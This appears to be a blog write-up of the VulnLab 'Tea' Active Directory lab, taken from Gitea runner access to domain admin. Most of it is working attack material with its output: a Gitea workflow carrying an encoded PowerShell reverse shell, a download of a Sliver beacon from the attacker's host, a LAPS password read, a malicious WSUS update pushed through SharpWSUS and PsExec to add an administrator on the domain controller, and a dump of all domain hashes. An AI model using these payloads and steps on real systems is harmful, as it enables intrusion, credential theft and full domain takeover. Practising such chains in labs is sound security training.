vulnlab-tea

vulnlab-tea

a medium rated AD chain machine, involved srv.tea.vl having an instance of gitea running which had an active runner, being able to register a user and enable actions on the repo, we can execute commands to get a reverse shell, -> Get-LapsADPassword -> SharpWSUS.exe -> domain admin on dc.tea.vl.

.

giteabuild

Create .gitea/workflows/demo.yaml file in the repository that we have created.

http://srv.tea.vl:3000/puck/puck/src/branch/main/.gitea/workflows/demo.yaml

name: Build
run-name: ${{ gitea.actor }} running build job
on: [push]

jobs:
  Explore-Gitea-Actions:
    runs-on: windows-latest
    steps:
      - run: echo "🍏 This job's status is ${{ job.status }}."
      - run: powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AOAAuADIALgAxADMAOAAiACwANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA

catch with netcat

┌──(puck㉿kali)-[~/vulnlab/tea]
└─$ rlwrap nc -nlvp 443                         
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.191.134] 50061

PS C:\Users\thomas.wallace\.cache\act\63805091085fb29f\hostexecutor> whoami
tea\thomas.wallace

download & execute Beacon

PS C:\_install> iwr http://10.8.2.138:8000/beacon.exe -o beacon.exe
PS C:\_install> PS C:\_install> ./beacon.exe

Sliver

┌──(puck㉿kali)-[~/vulnlab/tea]
└─$ sliver                    
Connecting to localhost:31337 ...
[*] Loaded 21 aliases from disk
[*] Loaded 128 extension(s) from disk

    ███████╗██╗     ██╗██╗   ██╗███████╗██████╗
    ██╔════╝██║     ██║██║   ██║██╔════╝██╔══██╗
    ███████╗██║     ██║██║   ██║█████╗  ██████╔╝
    ╚════██║██║     ██║╚██╗ ██╔╝██╔══╝  ██╔══██╗
    ███████║███████╗██║ ╚████╔╝ ███████╗██║  ██║
    ╚══════╝╚══════╝╚═╝  ╚═══╝  ╚══════╝╚═╝  ╚═╝

All hackers gain vigilance
[*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df
[*] Welcome to the sliver shell, please type 'help' for options

[*] Check for updates with the 'update' command

sliver > https --lport 8443

[*] Starting HTTPS :8443 listener ...

[*] Successfully started job #1

   
sliver > jobs

 ID   Name    Protocol   Port   Stage Profile 
==== ======= ========== ====== ===============
 1    https   tcp        8443                 


sliver > generate beacon --seconds 5 --jitter 3 --os windows --arch amd64 --format EXECUTABLE --http 10.8.2.138:8443 --name tea-3 --save /tmp/beacon.exe -G --skip-symbols

[*] Generating new windows/amd64 beacon implant binary (5s)
[!] Symbol obfuscation is disabled
[*] Build completed in 2s
[*] Implant saved to /tmp/beacon.exe

sliver > jobs

 ID   Name    Protocol   Port   Stage Profile 
==== ======= ========== ====== ===============
 1    https   tcp        8443                 

[*] Beacon 9d553a10 tea-3 - 10.10.191.134:50348 (SRV) - windows/amd64 - Tue, 20 Aug 2024 10:25:18 CEST

sliver > use 9d553a10

[*] Active beacon tea-3 (9d553a10-504e-4b41-927f-34a21b1a94bc)

sliver (tea-3) > ls

[*] Tasked beacon tea-3 (2cdcbb9d)

[+] tea-3 completed task 2cdcbb9d

C:\_install (6 items, 24.0 MiB)
===============================
-rw-rw-rw-  beacon.exe                 10.5 MiB   Tue Aug 20 01:16:47 -0700 2024
-rw-rw-rw-  beacon2.exe                10.5 MiB   Tue Aug 20 01:24:56 -0700 2024
-rw-rw-rw-  LAPS.x64.msi               1.1 MiB    Sun Dec 24 06:37:30 -0700 2023
-rw-rw-rw-  LAPS_OperationsGuide.docx  626.3 KiB  Sun Dec 24 06:37:39 -0700 2023
-rw-rw-rw-  PsExec64.exe               813.9 KiB  Sun Oct 22 06:03:38 -0700 2023
-rw-rw-rw-  PsInfo64.exe               523.4 KiB  Sun Dec 24 06:38:30 -0700 2023



sliver (tea-3) > sharp-hound-4 -i -s -t 120 -- -c all,gpolocalgroup

[*] Tasked beacon tea-3 (6338fcbb)

[+] tea-3 completed task 6338fcbb

[*] sharp-hound-4 output:
2024-08-20T01:27:54.2810142-07:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2024-08-20T01:27:54.9376664-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices
--snip--
2024-08-20T01:28:41.7584223-07:00|INFORMATION|Status: 309 objects finished (+309 6.866667)/s -- Using 69 MB RAM
2024-08-20T01:28:41.7687327-07:00|INFORMATION|Enumeration finished in 00:00:45.8844244
2024-08-20T01:28:41.8847345-07:00|INFORMATION|Saving cache with stats: 250 ID to type mappings.
 254 name to SID mappings.
 2 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2024-08-20T01:28:41.9476974-07:00|INFORMATION|SharpHound Enumeration Completed at 1:28 AM on 8/20/2024! Happy Graphing!

[*] Output saved to /tmp/sharp-hound-4_.3130027413.log

sliver (tea-3) > ls

[*] Tasked beacon tea-3 (3f00e892)

[+] tea-3 completed task 3f00e892

C:\_install (8 items, 24.0 MiB)
===============================
-rw-rw-rw-  20240820012840_BloodHound.zip                         23.2 KiB   Tue Aug 20 01:28:41 -0700 2024
-rw-rw-rw-  beacon.exe                                            10.5 MiB   Tue Aug 20 01:16:47 -0700 2024
-rw-rw-rw-  beacon2.exe                                           10.5 MiB   Tue Aug 20 01:24:56 -0700 2024
-rw-rw-rw-  LAPS.x64.msi                                          1.1 MiB    Sun Dec 24 06:37:30 -0700 2023
-rw-rw-rw-  LAPS_OperationsGuide.docx                             626.3 KiB  Sun Dec 24 06:37:39 -0700 2023
-rw-rw-rw-  NjdkNDliNTgtOWQ5Mi00ZTViLWI2NzctOWJlODE4OTM4ZGMy.bin  42.8 KiB   Tue Aug 20 01:28:41 -0700 2024
-rw-rw-rw-  PsExec64.exe                                          813.9 KiB  Sun Oct 22 06:03:38 -0700 2023
-rw-rw-rw-  PsInfo64.exe                                          523.4 KiB  Sun Dec 24 06:38:30 -0700 2023


sliver (tea-3) > download 20240820012840_BloodHound.zip

[*] Tasked beacon tea-3 (d8c023fe)

[+] tea-3 completed task d8c023fe

[*] Wrote 23731 bytes (1 file successfully, 0 files unsuccessfully) to /home/puck/vulnlab/tea/20240820012840_BloodHound.zip

sliver (tea-3) >  

                                                                                                                     
┌──(puck㉿kali)-[~/vulnlab/tea]

.

sliver (tea-3) > interactive

[*] Using beacon's active C2 endpoint: https://10.8.2.138:8443
[*] Tasked beacon tea-3 (d48d0ac7)

[*] Session 67a7541b tea-3 - 10.10.163.246:53086 (SRV) - windows/amd64 - Thu, 22 Aug 2024 09:21:51 CEST

sliver (tea-3) > use 67a7541b-db54-4c92-a36a-b6baec828a14

[*] Active session tea-3 (67a7541b-db54-4c92-a36a-b6baec828a14)

sliver (tea-3) > shell

? This action is bad OPSEC, are you an adult? Yes

[*] Wait approximately 10 seconds after exit, and press <enter> to continue
[*] Opening shell tunnel (EOF to exit) ...

[*] Started remote shell with pid 4600

PS C:\_install> Get-LAPSADPassword -Identity SRV -AsPlainText

Get-LAPSADPassword -Identity SRV -AsPlainText

ComputerName        : SRV
DistinguishedName   : CN=SRV,OU=Servers,DC=tea,DC=vl
Account             : Administrator
Password            : %t50Z))o4+0Z;6
PasswordUpdateTime  : 8/21/2024 11:53:03 PM
ExpirationTimestamp : 9/20/2024 11:53:03 PM
Source              : EncryptedPassword
DecryptionStatus    : Success
AuthorizedDecryptor : TEA\Server Administration

PS C:\_install> 

.

.

netexec winrm srv.tea.vl -u administrator -p 'rr<redacted>S9' --local
WINRM       10.10.191.134   5985   SRV              [*] Windows Server 2022 Build 20348 (name:SRV) (domain:tea.vl)
WINRM       10.10.191.134   5985   SRV              [+] SRV\administrator:rr<redacted>S9 (Pwn3d!)

.

evil-winrm -i srv.tea.vl -u administrator -p 'rr<redacted>S9'

or

xfreerdp /u:Administrator /p:rr<redacted>S9 /w:1566 /h:968 /v:srv.tea.vl:3389

not finished yet

iwr http://10.8.2.138:8000/SharpWSUS.exe -o sharpwsus.exe

.

SharpWSUS

sharpwsus locate

sharpwsus inspect

sharpwsus create /payload:"C:\Users\Administrator\Documents\psexec64.exe" /args:"-accepteula -s -d cmd.exe /c \\"net user puck Password123! /add && net localgroup administrators puck /add \"" /title:"Great UpdateC21" /date:2024-08-23 /kb:700123 /rating:Important /description:"Really important update" /url:"https://google.com"

sharpwsus approve /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:dc.tea.vl /groupname:"Awesome Group C2"

sharpwsus check /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:dc.tea.vl

sharpwsus delete /updateid:9e21a26a-1cbe-4145-934e-d8395acba567 /computername:dc.tea.vl /groupname:"Awesome Group C2"

.

.

C:\_install>sharpwsus create /payload:"C:\Users\Administrator\Documents\psexec64.exe" /args:"-accepteula -s -d cmd.exe /c \\"net user puck Password123! /add && net localgroup administrators puck /add \"" /title:"Great UpdateC21"

 ____  _                   __        ______  _   _ ____
/ ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
 ___) | | | | (_| | |  | |_) \ V  V /  ___) | |_| |___) |
|____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/
                       |_|
           Phil Keeble @ Nettitude Red Team

[*] Action: Create Update
C:\WSUS-Updates\WsusContent
[*] Creating patch to use the following:
[*] Payload: psexec64.exe
[*] Payload Path: C:\Users\Administrator\Documents\psexec64.exe
[*] Arguments: -accepteula -s -d cmd.exe /c \net
[*] Arguments (HTML Encoded): -accepteula -s -d cmd.exe /c \net

################# WSUS Server Enumeration via SQL ##################
ServerName, WSUSPortNumber, WSUSContentLocation
-----------------------------------------------
SRV, 8530, C:\WSUS-Updates\WsusContent

ImportUpdate
Update Revision ID: 198781
PrepareXMLtoClient
InjectURL2Download
DeploymentRevision
PrepareBundle
PrepareBundle Revision ID: 198782
PrepareXMLBundletoClient
DeploymentRevision

[*] Update created - When ready to deploy use the following command:
[*] SharpWSUS.exe approve /updateid:2aff56d0-6c1c-48ab-ac73-ab0483182818 /computername:Target.FQDN /groupname:"Group Name"

[*] To check on the update status use the following command:
[*] SharpWSUS.exe check /updateid:2aff56d0-6c1c-48ab-ac73-ab0483182818 /computername:Target.FQDN

[*] To delete the update use the following command:
[*] SharpWSUS.exe delete /updateid:2aff56d0-6c1c-48ab-ac73-ab0483182818 /computername:Target.FQDN /groupname:"Group Name"

[*] Create complete

There is no such global user or group: puck.

There is no such global user or group: " /title:Great.

There is no such global user or group: UpdateC21.

More help is available by typing NET HELPMSG 3783.



C:\_install>SharpWSUS.exe approve /updateid:2aff56d0-6c1c-48ab-ac73-ab0483182818 /computername:dc.tea.vl /groupname:"Group1"

 ____  _                   __        ______  _   _ ____
/ ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
 ___) | | | | (_| | |  | |_) \ V  V /  ___) | |_| |___) |
|____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/
                       |_|
           Phil Keeble @ Nettitude Red Team

[*] Action: Approve Update
C:\WSUS-Updates\WsusContent

Targeting dc.tea.vl
TargetComputer, ComputerID, TargetID
------------------------------------
dc.tea.vl, 216d99cd-2257-41e7-9687-2163fb7e39f7, 1
Group Exists = False
Group Created: Group1
Added Computer To Group
Approved Update

[*] Approve complete


C:\_install>

 

.

┌──(puck㉿kali)-[~/vulnlab]
└─$ netexec smb dc.tea.vl -u puckie -p 'Start123!'
SMB         10.10.145.21    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:tea.vl) (signing:True) (SMBv1:False)
SMB         10.10.145.21    445    DC               [+] tea.vl\puckie:Start123! (Pwn3d!)

.

Finaly

xfreerdp /u:puckie /p:'Start123!' /w:1566 /h:968 /v:dc.tea.vl:3389

.

catch the hashes

impacket-secretsdump 'tea/puckie:Start123!@dc.tea.vl' > allhashes.txt

 

This was super fun.

.

 

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *